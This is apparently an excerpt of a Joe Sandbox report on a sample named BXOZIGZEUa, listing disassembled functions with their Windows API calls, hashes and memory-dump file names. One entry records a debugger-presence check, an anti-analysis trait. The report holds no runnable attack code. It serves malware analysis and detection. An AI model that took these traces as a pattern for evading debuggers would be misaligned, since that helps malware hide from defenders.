Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: fec23e0e27c2bdd4891b56ea69a5bee60a8f069669dbbf3ec0dad7a52bf1f877
Instruction ID: 5eac22e6a7ff2eb117d59e0e74bad63c6c73030334fcf9dc224e255c3dc651c6
Opcode Fuzzy Hash: fec23e0e27c2bdd4891b56ea69a5bee60a8f069669dbbf3ec0dad7a52bf1f877
Instruction Fuzzy Hash: BA21DFBC8413049FD780EF18FCA465C3BE6FB5A354F60611AE4088BB61EBB45980CF41

Function 004D8F07 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74libraryCOMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000800,00000003,00000800,00000004), ref: 004D8F54
__snwprintf_s.LIBCMT ref: 004D8F8F
LoadLibraryExW.KERNEL32(?,00000000,00000000), ref: 004D8FDA

Part of subcall function 005CE629: __getptd_noexit.LIBCMT ref: 005CE629

Strings

LOC, xrefs: 004D8F34

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: InfoLibraryLoadLocale__getptd_noexit__snwprintf_s
String ID: LOC
API String ID: 3175857669-519433814
Opcode ID: 0407c25d333ad6e0de1e333b0666a9efb2867457421cd5e252f77acb2e330033
Instruction ID: 00d3fc08e99a89ae01c15d80f0970d73eaa4f5d69410ae9c8fd6cb39bfc827b5
Opcode Fuzzy Hash: 0407c25d333ad6e0de1e333b0666a9efb2867457421cd5e252f77acb2e330033
Instruction Fuzzy Hash: A521B331901219AFDB11BBA4DC5AFBE7BA9BF90714F10009FB105AB281DF786A40CB55

Function 004DB3FE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,00000104,?,004DB85B,?,?,?,?,?,00000000,00000000), ref: 004DB412
GetProcAddress.KERNEL32(00000000,FindFirstFileTransactedW), ref: 004DB422

Strings

FindFirstFileTransactedW, xrefs: 004DB41C
kernel32.dll, xrefs: 004DB40D

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: FindFirstFileTransactedW$kernel32.dll
API String ID: 1646373207-2878570079
Opcode ID: 602cd9dd4f4e97ed58eab11cad6faa9a978506de50bbc2086a66c848f49e9bab
Instruction ID: d2c840b9c74db4314549c9309e064b1687085cdc58f404cb608ae91befb3fc92
Opcode Fuzzy Hash: 602cd9dd4f4e97ed58eab11cad6faa9a978506de50bbc2086a66c848f49e9bab
Instruction Fuzzy Hash: 1BF0A732200604F78B315F5AAC18C7BBF6AFBD1F72325852BF165C1261CB7948A1DAA5

Function 0052A4EB Relevance: 4.5, APIs: 3, Instructions: 43windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 0052A508

Part of subcall function 004DACFF: __CxxThrowException@8.LIBCMT ref: 004DAD15
Part of subcall function 004DACFF: __EH_prolog3.LIBCMT ref: 004DAD22

IsIconic.USER32(?), ref: 0052A531
GetParent.USER32(?), ref: 0052A53E

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Parent$Exception@8H_prolog3IconicThrow
String ID:
API String ID: 144390861-0
Opcode ID: 7f480d94de24477ac8fdefad8069249f9560c46fcf576f2f93a6a882db6f0241
Instruction ID: 1572b50bd4304b1b746528fa81e6695b11f64c8f1cbe31557875c1c979d45e2e
Opcode Fuzzy Hash: 7f480d94de24477ac8fdefad8069249f9560c46fcf576f2f93a6a882db6f0241
Instruction Fuzzy Hash: 38F06232340225ABDF216A73BC04A2B7E5AFFA53A9B11442BF909D3551EE34DC149A92

Function 005220D5 Relevance: 4.5, APIs: 3, Instructions: 32keyboardCOMMON

Download Yara Rule

APIs

GetKeyState.USER32(00000010), ref: 00522100
GetKeyState.USER32(00000011), ref: 00522109
GetKeyState.USER32(00000012), ref: 00522112

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: State
String ID:
API String ID: 1649606143-0
Opcode ID: 6ce6db1b04d7ca53df69b17349780c4cd27925f4f23e7b1baa4c678a35019cbd
Instruction ID: 4d087e54a700503121ea75321121eb27529bcb14ac930569210a40c5a40e6e5d
Opcode Fuzzy Hash: 6ce6db1b04d7ca53df69b17349780c4cd27925f4f23e7b1baa4c678a35019cbd
Instruction Fuzzy Hash: BEF0E53920037DBBDB1062D1AD02FB07E55AF12780F148061EB44B70C5CAF0E961E6B0

Function 00524603 Relevance: 3.1, APIs: 2, Instructions: 57windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32(?), ref: 00524657
PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 005246A7

Part of subcall function 004ECBFE: GetWindowLongW.USER32(?,000000F0), ref: 004ECC09

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: IconicLongMessagePostWindow
String ID:
API String ID: 1855654840-0
Opcode ID: 5b75d335482d6474d49fbe4119dd366cd56171bccfe432f0c73faf0e2b05141d
Instruction ID: 237b86a2d0c8e26630ac87d9a5a3cf288357d6cac33d5337dcd625772df635b3
Opcode Fuzzy Hash: 5b75d335482d6474d49fbe4119dd366cd56171bccfe432f0c73faf0e2b05141d
Instruction Fuzzy Hash: 29110073220BA14FD7349A39ED85B6A7AE2FF57714F180A29E042C61E1DB68FC049E10

Function 0055F4A8 Relevance: 3.0, APIs: 2, Instructions: 41keyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 004ECBFE: GetWindowLongW.USER32(?,000000F0), ref: 004ECC09

GetKeyState.USER32(00000073), ref: 0055F4D4
GetKeyState.USER32(00000012), ref: 0055F4DD

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: State$LongWindow
String ID:
API String ID: 3716621309-0
Opcode ID: 5d24020ec53d83d3a072b46281ff03e1ab40c8f3e0fa9e838d34ba352d2c1f12
Instruction ID: 14312ab4e4ae7d4c7cdb328ef9422cc103ccff2ac79c0f6813fe4256dc221649
Opcode Fuzzy Hash: 5d24020ec53d83d3a072b46281ff03e1ab40c8f3e0fa9e838d34ba352d2c1f12
Instruction Fuzzy Hash: 91F0FC3230024A76EF213956DC51EBB3E28EF907A5F104037FD08C6255CE35DD15A350

Function 0051814E Relevance: 3.0, APIs: 2, Instructions: 37windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00518162
IsIconic.USER32(?), ref: 00518174

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: IconicVisibleWindow
String ID:
API String ID: 1797901696-0
Opcode ID: 12c2506019c0b5e31c5474ad407611afd78bcd1ec86a680e1da79f03a4b72dd6
Instruction ID: 4c6be2d617e4edff235fbe1286687394bfcbcceb304153d71bf9661eedf53582
Opcode Fuzzy Hash: 12c2506019c0b5e31c5474ad407611afd78bcd1ec86a680e1da79f03a4b72dd6
Instruction Fuzzy Hash: 7FF08933740910779A31262B9C059BFBE5EBBE2B70714032AF529921F0EE708887D594

Function 004DD36B Relevance: 3.0, APIs: 2, Instructions: 34comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 004DD399
CoCreateInstance.OLE32(00621F68,00000000,00000001,005F987C,006432AC,-0000043C,?,?,004EF56F,00000000,?,00525930), ref: 004DD3B7

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: CreateInitializeInstance
String ID:
API String ID: 3519745914-0
Opcode ID: a4fa93822a445f22d7ab04c9a318c8fa2bdc5d7d47ab2adc8f40a4754299d893
Instruction ID: 49d78e9da17d2f13cbdd274fa8f4bed064801b7a7253a949ace793e5d0e3fb48
Opcode Fuzzy Hash: a4fa93822a445f22d7ab04c9a318c8fa2bdc5d7d47ab2adc8f40a4754299d893
Instruction Fuzzy Hash: 30F08275740206EBD7209E54DCC8AB677A9EB94309F28043FF645EA340C7BA6897CB52

Function 004F0624 Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON

Download Yara Rule

APIs

SetForegroundWindow.USER32(?), ref: 004F0651
IsIconic.USER32(?), ref: 004F065A

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: ForegroundIconicWindow
String ID:
API String ID: 1248896474-0
Opcode ID: 3436be90ad2ad71635a8fd640e36076634521604979dd6331d07a40dfd778d9f
Instruction ID: dd6124c5ea7a4b5ffe5c97624527cebced425f211f9742fb254c4b4f22bb4577
Opcode Fuzzy Hash: 3436be90ad2ad71635a8fd640e36076634521604979dd6331d07a40dfd778d9f
Instruction Fuzzy Hash: 94E02B32204650ABE72027669C09E3B7EB5FFD4732B15022BF616CB2F2DE188C11C759

Function 004F06C8 Relevance: 1.5, APIs: 1, Instructions: 28windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32(?), ref: 004F06E8

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Iconic
String ID:
API String ID: 110040809-0
Opcode ID: 3209123467e687d42974359223c5d167e4384993d6d9eac8bff335477acbab5c
Instruction ID: de484ebb2d58264f65574acd7783c0210d8ebef66e3bc6480267033c9b0618fa
Opcode Fuzzy Hash: 3209123467e687d42974359223c5d167e4384993d6d9eac8bff335477acbab5c
Instruction Fuzzy Hash: 3DE0DF32398501AAA6242679BC49D3B2AD9EBC8B16B14022BF606C3591DE18A8028269

Function 005CE120 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: 1b6070336216e4b4e3529fc280185b332f2666130153be2390e8b0a9d348cc43
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 96115BB72011418FD6148ABDC8B6FB7AFA6FBC6320B2C437EC0418B754D232D961D500

Function 00547335 Relevance: 51.1, APIs: 28, Strings: 1, Instructions: 323fileCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 0054733F
GetModuleFileNameW.KERNEL32(00000000,005162A3,00000104,?,00000A90,005478F3,?,00000000,00000084,00547D9A,0000000A,0000000A,0000000A,00000000,00000014,0059FFC9), ref: 005473EE
__wsplitpath_s.LIBCMT ref: 0054741A
__wsplitpath_s.LIBCMT ref: 00547439
__wmakepath_s.LIBCMT ref: 00547466
_wcslen.LIBCMT ref: 00547472
CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,00000A90,005478F3,?,00000000,00000084,00547D9A,0000000A,0000000A), ref: 005474AA

Strings

, xrefs: 005477E6

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: File__wsplitpath_s$CreateH_prolog3_ModuleName__wmakepath_s_wcslen
String ID:
API String ID: 1221639053-3916222277
Opcode ID: dd73eb3a0e544a9ef2014781bb0a8b1827449d6aa8717faf5130ecdebcb8ae13
Instruction ID: df46e2556c293d9815c888a2a0d5a8810418b86baeccf42f047e010eda66e97a
Opcode Fuzzy Hash: dd73eb3a0e544a9ef2014781bb0a8b1827449d6aa8717faf5130ecdebcb8ae13
Instruction Fuzzy Hash: ABD12971A00329AFDF209F60CC85AEDBB79FB1A318F1005EAF50AA2551DB745E84DF52

Function 0050A64D Relevance: 49.9, APIs: 33, Instructions: 446COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 0050A68C
PtInRect.USER32(?,?,?), ref: 0050A6A2
GetClientRect.USER32(?,?), ref: 0050A6BF
PtInRect.USER32(?,?,?), ref: 0050A6DA
GetSystemMetrics.USER32(0000000D), ref: 0050A706
GetSystemMetrics.USER32(0000000E), ref: 0050A711
PtInRect.USER32(?,?,?), ref: 0050A755

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Rect$MetricsSystem$ClientWindow
String ID:
API String ID: 2286436557-0
Opcode ID: a0b93f75a2d5dd5abc0ca8701fa2809793c8beaa0d4414ed6f2850c3e4fac84f
Instruction ID: 168ef580c13815e93bd3c7aba1d73918afcf3088b0781477756692662c273624
Opcode Fuzzy Hash: a0b93f75a2d5dd5abc0ca8701fa2809793c8beaa0d4414ed6f2850c3e4fac84f
Instruction Fuzzy Hash: 0DF1C471A0020EAFDF04DFA4CD84EEEBBB9BF48344F10452AE515E7290DA35EA45DB61

Function 004FACA7 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 457keyboardCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 004FACAE
GetParent.USER32(?), ref: 004FAD09
GetParent.USER32(?), ref: 004FAD25
UpdateWindow.USER32(?), ref: 004FAD6D
SetCursor.USER32(?,00000000), ref: 004FAD92
GetAsyncKeyState.USER32(00000012), ref: 004FADF4
UpdateWindow.USER32(?), ref: 004FAEFA
InflateRect.USER32(?,00000002,00000002), ref: 004FAF5A
SetCapture.USER32(?), ref: 004FAF63
SetCursor.USER32(00000000), ref: 004FAF7B
IsWindow.USER32(?), ref: 004FB019
GetCursorPos.USER32(?), ref: 004FB058
ScreenToClient.USER32(?,?), ref: 004FB065
PtInRect.USER32(?,?,?), ref: 004FB081
RedrawWindow.USER32(?,00000000,00000000,00000505,?,?,?,?,?,?,?,00000000), ref: 004FB0F5
GetParent.USER32(?), ref: 004FB110
GetParent.USER32(?), ref: 004FB124
RedrawWindow.USER32(?,00000000,00000000,00000505,00000000,?,?,?,?,?,?,?,00000000), ref: 004FB136
RedrawWindow.USER32(?,00000000,00000000,00000505,?,?,?,?,?,?,?,00000000), ref: 004FB158
GetParent.USER32(?), ref: 004FB161
GetParent.USER32(?), ref: 004FB17C
GetParent.USER32(?), ref: 004FB187
InvalidateRect.USER32(?,?,00000001,?,?,?,?,?,?,?,00000000), ref: 004FB1BF
RedrawWindow.USER32(?,00000000,00000000,00000505,00000000,?,00000000,?,?,?,?,?,?,00000000), ref: 004FB2F7

Part of subcall function 004F83AB: InvalidateRect.USER32(?,?,00000001,?), ref: 004F8420
Part of subcall function 004F83AB: InflateRect.USER32(?,?,?), ref: 004F8466
Part of subcall function 004F83AB: RedrawWindow.USER32(?,?,00000000,00000401,?,?), ref: 004F8479

UpdateWindow.USER32(?), ref: 004FB257
UpdateWindow.USER32(?), ref: 004FB2B6
SetCapture.USER32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 004FB2C1

Strings

83`, xrefs: 004FB169

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Window$Parent$RectRedraw$Update$Cursor$CaptureInflateInvalidate$AsyncClientH_prolog3_ScreenState
String ID: 83`
API String ID: 991125134-1826646354
Opcode ID: ce7baf5374865429956633a0297478f058f8be078b328f229ae1a64d4351e612
Instruction ID: e4ac4e314660a2e37541cda54767af928ebce6ae2d432c2f88c3df61209fe16b
Opcode Fuzzy Hash: ce7baf5374865429956633a0297478f058f8be078b328f229ae1a64d4351e612
Instruction Fuzzy Hash: 590291746002189FCF119F65CC98ABE7BB5FF09754F14027AF90A9A2A6DF398804CF95

Function 0051F0F4 Relevance: 40.8, APIs: 27, Instructions: 344COMMON

Download Yara Rule

APIs

Part of subcall function 004ECC18: GetWindowLongW.USER32(?,000000EC), ref: 004ECC23

GetClientRect.USER32(?,00000000), ref: 0051F166
CopyRect.USER32(?,?), ref: 0051F198

Part of subcall function 004E011B: ScreenToClient.USER32(?,?), ref: 004E012C
Part of subcall function 004E011B: ScreenToClient.USER32(?,?), ref: 004E0139

IntersectRect.USER32(?,?,?), ref: 0051F1E7
SetRectEmpty.USER32(?), ref: 0051F1F5
IntersectRect.USER32(?,?,?), ref: 0051F227
SetRectEmpty.USER32(?), ref: 0051F235
IsRectEmpty.USER32(?), ref: 0051F245
IsRectEmpty.USER32(?), ref: 0051F24F
GetWindowRect.USER32(?,?), ref: 0051F27A
GetWindowRect.USER32(?,?), ref: 0051F29D
UnionRect.USER32(?,?,?), ref: 0051F2BA
EqualRect.USER32(?,?), ref: 0051F2C8
GetWindowRect.USER32(?,?), ref: 0051F353
IsRectEmpty.USER32(?), ref: 0051F3BD
MapWindowPoints.USER32(?,?,?,00000002), ref: 0051F3DA
RedrawWindow.USER32(?,?,00000000,00000185), ref: 0051F3EE
IsRectEmpty.USER32(?), ref: 0051F408
EqualRect.USER32(?,?), ref: 0051F416
MapWindowPoints.USER32(?,?,?,00000002), ref: 0051F433
RedrawWindow.USER32(?,?,00000000,00000185), ref: 0051F447
UpdateWindow.USER32(?), ref: 0051F45C
IsRectEmpty.USER32(?), ref: 0051F4A0
InvalidateRect.USER32(?,?,00000001), ref: 0051F4B5
IsRectEmpty.USER32(?), ref: 0051F4BB
EqualRect.USER32(?,?), ref: 0051F4CD
InvalidateRect.USER32(?,?,00000001), ref: 0051F4E0
UpdateWindow.USER32(?), ref: 0051F4E5

Memory Dump Source

